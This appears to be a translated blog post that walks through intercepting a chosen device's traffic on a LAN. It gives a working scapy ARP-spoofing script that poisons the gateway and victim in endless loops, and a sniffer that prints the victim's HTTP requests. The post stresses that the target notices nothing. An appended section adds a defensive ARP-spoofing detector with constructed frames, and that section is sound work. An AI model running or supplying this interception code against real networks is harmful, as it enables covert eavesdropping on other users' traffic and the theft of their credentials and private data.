Targeted device packet capture on a LAN with scapy

2022-07-10  sexy_cyber

Monitoring traffic for the whole network works on the same principle: just iterate over the IPs that are alive on the LAN.

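Foreword

  1. It is genuinely rather scary when you think about it: the target machine is being monitored and does not notice a thing.
  2. There is a countermeasure against this monitoring, though: set up an encrypted tunnel (VPN) to cross the small LAN safely, which is the same concept as crossing the big LAN.

Let's get started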

echo 1 >> /proc/sys/net/ipv4/ip_forward

from scapy.all import *
from threading import Thread
import time

gateway_device = ARP()
# pdst: target host
gateway_device.pdst = "192.168.0.1"
# psrc: source host
gateway_device.psrc = "192.168.0.109"

chicken_device = ARP()
chicken_device.psrc = gateway_device.pdst
chicken_device.pdst = gateway_device.psrc
# Send spoofed packets to the gateway
def wifi():
    while True:
        time.sleep(0.8)
        send(gateway_device)
# Send spoofed packets to the victim host
def chicken():
    while True:
        time.sleep(0.8)
        send(chicken_device)
t1 = Thread(target = wifi)
t2 = Thread(target = chicken)
t1.start()
t2.start()

from scapy.all import *


def capture(x):
    # if b'HTTP/' in x.lastlayer().original and x.lastlayer().original[0:4] != b'HTTP':
    # Monitor HTTP traffic; if it is encrypted by a VPN proxy, the request headers and body generally cannot be decrypted
    if b'HTTP/' in x.lastlayer().original:
    # if x.lastlayer().original:
        try:
            request_body = x.lastlayer().original
            request_body = request_body.decode('utf-8')
        except UnicodeDecodeError:
            request_body = str(x.lastlayer().original)
        if 'allall01.baidupcs.com' in request_body:
            return
        if 'netdisk' in request_body:
            return
        if 'baidu' in request_body:
            return
        dst_ip = x.payload.dst
        if dst_ip == '192.168.0.100':
            return
        print('dst ip:', dst_ip)
        request_body = request_body.replace('\\r\\n','\r\n')
        print('request body:', request_body)


def main():
    sniff(filter="tcp", prn=lambda x: capture(x))


if __name__ == '__main__':
    main()
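
Seen from the defender's side, the spoofing above appears on the wire as an IP address being announced by a new MAC, and as one MAC claiming both the gateway's and a host's address. The following is an added example, not part of the original post: a standard-library Python detector that reads the sender fields of raw ARP frames and flags both conditions. The MAC addresses and the names `ArpWatch`, `parse_arp` and `build_arp` are constructed for illustration; the IP addresses are the two used in the script above.

```python
import socket
from collections import defaultdict

ARP_HDR = bytes.fromhex("0806000108000604")  # ethertype ARP, Ethernet/IPv4, hlen 6, plen 4

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip) for Ethernet/IPv4 ARP, else None."""
    if len(frame) < 42 or frame[12:20] != ARP_HDR:
        return None
    op = int.from_bytes(frame[20:22], "big")
    return op, frame[22:28].hex(":"), socket.inet_ntoa(frame[28:32])

class ArpWatch:
    def __init__(self):
        self.ip_to_mac = {}                 # first MAC seen for each IP
        self.mac_to_ips = defaultdict(set)  # every IP a MAC has claimed

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[2] == "0.0.0.0":  # not ARP, or an ARP probe
            return []
        # op is not filtered: scapy's ARP() defaults to who-has (op 1), and
        # receivers update their caches from requests as well as replies.
        _op, smac, sip = parsed
        alerts = []
        known = self.ip_to_mac.setdefault(sip, smac)  # first sighting is trusted
        if known != smac:
            alerts.append(("binding-changed", sip, known, smac))
        self.mac_to_ips[smac].add(sip)
        if len(self.mac_to_ips[smac]) > 1:
            alerts.append(("multi-ip", smac, sorted(self.mac_to_ips[smac])))
        return alerts

def build_arp(op, smac, sip, tip):
    """Build a constructed sample frame (broadcast destination, zero target MAC)."""
    hw = bytes.fromhex(smac.replace(":", ""))
    return (b"\xff" * 6 + hw + ARP_HDR + op.to_bytes(2, "big")
            + hw + socket.inet_aton(sip) + b"\x00" * 6 + socket.inet_aton(tip))

GW, HOST, ROGUE = "02:00:00:00:00:01", "02:00:00:00:00:6d", "02:00:00:00:00:99"  # constructed
SAMPLE = [
    build_arp(2, GW, "192.168.0.1", "192.168.0.109"),     # genuine gateway reply
    build_arp(1, HOST, "192.168.0.109", "192.168.0.1"),   # genuine host request
    build_arp(1, ROGUE, "192.168.0.1", "192.168.0.109"),  # third MAC claims the gateway IP
    build_arp(1, ROGUE, "192.168.0.109", "192.168.0.1"),  # third MAC claims the host IP
]

if __name__ == "__main__":
    watch = ArpWatch()
    for frame in SAMPLE:
        print(watch.observe(frame))
```

A MAC that legitimately holds several addresses (a router doing proxy ARP, a host with alias IPs) also triggers `multi-ip`, so allow-list those before alerting on it.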
